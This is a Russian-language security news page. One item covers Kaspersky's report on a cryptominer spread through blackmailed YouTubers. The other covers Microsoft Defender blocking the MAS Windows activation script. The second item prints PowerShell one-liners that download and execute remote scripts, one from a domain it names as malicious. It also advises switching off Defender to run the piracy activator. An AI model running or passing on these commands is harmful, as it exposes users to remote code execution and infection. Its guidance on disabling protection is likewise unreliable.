Злоумышленники шантажируют ютуберов и распространяют через них майнер

Злоумышленники шантажируют ютуберов и распространяют через них майнер

Злоумышленники шантажируют ютуберов и распространяют через них майнер

Аналитики Глобального центра исследований и анализа угроз компании «Лаборатория Касперского» (Kaspersky GReAT) зафиксировали новую кампанию, нацеленную на российских пользователей. Злоумышленники распространяют криптомайнер под видом программ для обхода блокировок, использующих системы глубокого анализа трафика (DPI).

По данным Kaspersky GReAT, число пострадавших уже превысило 2 тысячи человек, но реальное количество заражений может быть выше.

Одним из основных каналов распространения стали YouTube-блогеры. В частности, владелец канала с аудиторией около 60 тысяч человек опубликовал несколько видео с инструкциями по обходу блокировок. Предположительно, злоумышленники шантажировали блогера, заставляя добавить в описание ссылку на зараженный файл, размещенный на GitHub.

Архив со зловредом был загружен не менее 40 тысяч раз, однако позднее ссылка была удалена.

Аналитики Kaspersky GReAT обнаружили в обсуждениях на репозитории сообщения о новом виде шантажа. Злоумышленники угрожали авторам каналов удалением их контента за фиктивное нарушение авторских прав, требуя в обмен разместить ссылки на зараженные файлы. При этом сами блогеры могли не осознавать, что таким образом распространяют вредоносные программы.

После скачивания архива с вредоносной ссылки на устройство пользователя вместе с заявленными инструментами устанавливался троян, который загружал SilentCryptoMiner. Этот криптомайнер использует вычислительные мощности зараженного компьютера для добычи различных видов криптовалюты.

Зловред распространяется с осени 2024 года и обладает механизмами сокрытия, которые затрудняют его обнаружение.

С августа 2024 года злоумышленники начали массово распространять вредонос, выдавая его за инструменты для обхода блокировок и замедлений YouTube. Помимо майнера, среди обнаруженных угроз преобладали трояны для удаленного доступа (RAT).

«YouTube — не единственный вектор распространения SilentCryptoMiner. Мы также выявили теневой канал в мессенджере, содержащий вредоносную сборку, на которую ссылался YouTube-канал с 340 тысячами подписчиков. Не исключаем, что аналогичные схемы могут использоваться для распространения и других типов вредоносного ПО», — комментирует Леонид Безвершенко, эксперт Kaspersky GReAT.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru